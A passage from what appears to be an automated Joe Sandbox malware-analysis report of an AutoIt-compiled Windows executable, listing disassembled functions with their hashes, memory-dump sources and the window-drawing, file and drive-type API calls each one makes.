                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 99c253ca9925f1631cc642fe5955173a28e0f20d59eaf0fb4f46ac81a4ae862f
                                                                                                            • Instruction ID: e6281e0d0e2b689c8892a9fa3d8a81cc8525783f5af55a1cf7eacd0cb8d9d407
                                                                                                            • Opcode Fuzzy Hash: 99c253ca9925f1631cc642fe5955173a28e0f20d59eaf0fb4f46ac81a4ae862f
                                                                                                            • Instruction Fuzzy Hash: C002C5B0E00605EFDF04DF64D881AADBBB5FF44304F548169E8569B291EB31EA24CBB5
                                                                                                            Function 00D89EEE Relevance: .3, Instructions: 294COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: de43b356f4b1a3361520081543c74c52915e5f3bcdc94e00c452e3bf9534f4f4
                                                                                                            • Instruction ID: 9fef1c8f38dfce66b95ffe538b2da639053fa86bfb139810a9e433a8c7f0aa2e
                                                                                                            • Opcode Fuzzy Hash: de43b356f4b1a3361520081543c74c52915e5f3bcdc94e00c452e3bf9534f4f4
                                                                                                            • Instruction Fuzzy Hash: F2B1F620D2AF414DD723A6398835336B79CAFBB6D5F52D71BFC1674E62EB2185838140
                                                                                                            Function 00D71C77 Relevance: .3, Instructions: 254COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                            • Instruction ID: 37ea4ab05e4cacd7d84c87c1ca95d4134ecc9d7749e794dbf7e2be000e4da322
                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                            • Instruction Fuzzy Hash: E49188761080A34ADB29463E857507EFFE15A923A131E479EE4FACB1C1FE20C958DA30
                                                                                                            Function 00D719B0 Relevance: .2, Instructions: 240COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                            • Instruction ID: 69baef3f77723618a9de301e7c4ea3bce38784cb609bf99e887383b092d01fde
                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                            • Instruction Fuzzy Hash: B391857A2090A34ADB2D467E857403EFFE15B923A131E879ED4FACA1C1FE14C659D630
                                                                                                            Function 00D77A4A Relevance: .2, Instructions: 237COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9676f6744dcd3619438f22f9e4e9700b4e0ea568174b8b675d851e3a0a8b275f
                                                                                                            • Instruction ID: dccd11a5a13e0e850905a07a87e72107a98a14fb1572fb1373127a7629fa2075
                                                                                                            • Opcode Fuzzy Hash: 9676f6744dcd3619438f22f9e4e9700b4e0ea568174b8b675d851e3a0a8b275f
                                                                                                            • Instruction Fuzzy Hash: CF617A31748709A6EE389A288C95BBF2394DF45700F1CCD1AE98EDB281F611DE42C775
                                                                                                            Function 00D77CA7 Relevance: .2, Instructions: 237COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f3e7f2e076d494f5cf5f5e9960df8ee590015cf5df91046c2562b22c32b62695
                                                                                                            • Instruction ID: 5a750f957e01577ff9e7482676028d6aa9e341b68010950a7f9a5aebdfa1d617
                                                                                                            • Opcode Fuzzy Hash: f3e7f2e076d494f5cf5f5e9960df8ee590015cf5df91046c2562b22c32b62695
                                                                                                            • Instruction Fuzzy Hash: C5618A3164870AE6DE384A684855BBF2394EF42704F1CCD5AF98EDB281FA12DD42D375
                                                                                                            Function 00D71706 Relevance: .2, Instructions: 232COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                            • Instruction ID: c3f210acbcc492a8aa6456e2132dc30875c45f9ddaea1c54a526e53175011fea
                                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                            • Instruction Fuzzy Hash: C181863A5080A349DB6D463D853403EFFE15A923A131E879ED4FACB1C1FE24C559E630
                                                                                                            Function 00DD2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DD2B30
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DD2B43
                                                                                                            • DestroyWindow.USER32 ref: 00DD2B52
                                                                                                            • GetDesktopWindow.USER32 ref: 00DD2B6D
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DD2B74
                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DD2CA3
                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DD2CB1
                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2CF8
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00DD2D04
                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DD2D40
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D62
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D75
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D80
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00DD2D89
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D98
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DD2DA1
                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2DA8
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00DD2DB3
                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2DC5
                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DEFC38,00000000), ref: 00DD2DDB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00DD2DEB
                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DD2E11
                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DD2E30
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2E52
                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD303F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                            • Opcode ID: 2d6dad6d7e387c27819515bcf27ada4f7107407fcf53ffa4147ebf9e16383621
                                                                                                            • Instruction ID: 61322a032b60bd3b7a4c8fda2c36c03efd25e7e11613bc69e5a514694efe2944
                                                                                                            • Opcode Fuzzy Hash: 2d6dad6d7e387c27819515bcf27ada4f7107407fcf53ffa4147ebf9e16383621
                                                                                                            • Instruction Fuzzy Hash: 62026B71910208AFDB14DF68CC89EAE7BB9EF48311F148559F915AB2A1DB70AD06CB70
                                                                                                            Function 00DE70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00DE712F
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00DE7160
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00DE716C
                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00DE7186
                                                                                                            • SelectObject.GDI32(?,?), ref: 00DE7195
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00DE71C0
                                                                                                            • GetSysColor.USER32(00000010), ref: 00DE71C8
                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00DE71CF
                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00DE71DE
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DE71E5
                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00DE7230
                                                                                                            • FillRect.USER32(?,?,?), ref: 00DE7262
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE7284
                                                                                                              • Part of subcall function 00DE73E8: GetSysColor.USER32(00000012), ref: 00DE7421
                                                                                                              • Part of subcall function 00DE73E8: SetTextColor.GDI32(?,?), ref: 00DE7425
                                                                                                              • Part of subcall function 00DE73E8: GetSysColorBrush.USER32(0000000F), ref: 00DE743B
                                                                                                              • Part of subcall function 00DE73E8: GetSysColor.USER32(0000000F), ref: 00DE7446
                                                                                                              • Part of subcall function 00DE73E8: GetSysColor.USER32(00000011), ref: 00DE7463
                                                                                                              • Part of subcall function 00DE73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DE7471
                                                                                                              • Part of subcall function 00DE73E8: SelectObject.GDI32(?,00000000), ref: 00DE7482
                                                                                                              • Part of subcall function 00DE73E8: SetBkColor.GDI32(?,00000000), ref: 00DE748B
                                                                                                              • Part of subcall function 00DE73E8: SelectObject.GDI32(?,?), ref: 00DE7498
                                                                                                              • Part of subcall function 00DE73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00DE74B7
                                                                                                              • Part of subcall function 00DE73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DE74CE
                                                                                                              • Part of subcall function 00DE73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00DE74DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124339563-0
                                                                                                            • Opcode ID: e68e5eb446f8e5641d811e99a7e93eac85cf98750757eb2bd146d4f9328218b4
                                                                                                            • Instruction ID: c5b58b6279def78b4caef67ec754336fe2af336b6e98ca4959464b2dc539655a
                                                                                                            • Opcode Fuzzy Hash: e68e5eb446f8e5641d811e99a7e93eac85cf98750757eb2bd146d4f9328218b4
                                                                                                            • Instruction Fuzzy Hash: 93A1B472018341AFD741AF60DC88E5B7BA9FB49320F141A19FAA2DA2E1D731E945CB71
                                                                                                            Function 00D68D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?), ref: 00D68E14
                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DA6AC5
                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DA6AFE
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DA6F43
                                                                                                              • Part of subcall function 00D68F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D68BE8,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68FC5
                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00DA6F7F
                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DA6F96
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DA6FAC
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DA6FB7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 2760611726-4108050209
                                                                                                            • Opcode ID: faec075dbfed445b00e736b1f74be739aa511a94a5b304ee90ea8ccb0975161b
                                                                                                            • Instruction ID: 3cee1a9c58d68463dd90eb2ff288a21155b8cd48171f4e44f2c968e41f6d5864
                                                                                                            • Opcode Fuzzy Hash: faec075dbfed445b00e736b1f74be739aa511a94a5b304ee90ea8ccb0975161b
                                                                                                            • Instruction Fuzzy Hash: A7129D30200241DFDB25DF24C884BA6BBE5FB5A311F1C8569F485DB262CB32E996DB71
                                                                                                            Function 00DD2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000), ref: 00DD273E
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DD286A
                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DD28A9
                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DD28B9
                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DD2900
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00DD290C
                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DD2955
                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DD2964
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00DD2974
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00DD2978
                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DD2988
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD2991
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00DD299A
                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DD29C6
                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DD29DD
                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DD2A1D
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DD2A31
                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DD2A42
                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DD2A77
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00DD2A82
                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DD2A8D
                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DD2A97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                            • API String ID: 2910397461-517079104
                                                                                                            • Opcode ID: 712f2a08110b87fedc3ab64730f9b96a10239f2cb09d468037443766349beea5
                                                                                                            • Instruction ID: 13892bda2defc237e7e1a6c5255b557426d16d8863c25ceaa73b4fcc2f98fe7a
                                                                                                            • Opcode Fuzzy Hash: 712f2a08110b87fedc3ab64730f9b96a10239f2cb09d468037443766349beea5
                                                                                                            • Instruction Fuzzy Hash: F0B17C71A10315AFEB24DF68CC89FAE7BA9EB08711F004155F914EB2A0D770ED45CBA0
                                                                                                            Function 00DC4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00DC4AED
                                                                                                            • GetDriveTypeW.KERNEL32(?,00DECB68,?,\\.\,00DECC08), ref: 00DC4BCA
                                                                                                            • SetErrorMode.KERNEL32(00000000,00DECB68,?,\\.\,00DECC08), ref: 00DC4D36
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                            • Opcode ID: ef6317496c2fa49164c8e588e7b0b052200b5cc1dc19b0605c166378ec84f899
                                                                                                            • Instruction ID: f8c1ed6f55b8b44ec54bd4bd0bfb86688c4e7edae1ab528f8d8319f55c943df5
                                                                                                            • Opcode Fuzzy Hash: ef6317496c2fa49164c8e588e7b0b052200b5cc1dc19b0605c166378ec84f899
                                                                                                            • Instruction Fuzzy Hash: 2761A030605207DBDB14EF28CAA2EA9B7B1EF44344B24541DFC46AB2A1DB31ED85DB71
                                                                                                            Function 00DE73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSysColor.USER32(00000012), ref: 00DE7421
                                                                                                            • SetTextColor.GDI32(?,?), ref: 00DE7425
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00DE743B
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00DE7446
                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00DE744B
                                                                                                            • GetSysColor.USER32(00000011), ref: 00DE7463
                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DE7471
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00DE7482
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00DE748B
                                                                                                            • SelectObject.GDI32(?,?), ref: 00DE7498
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00DE74B7
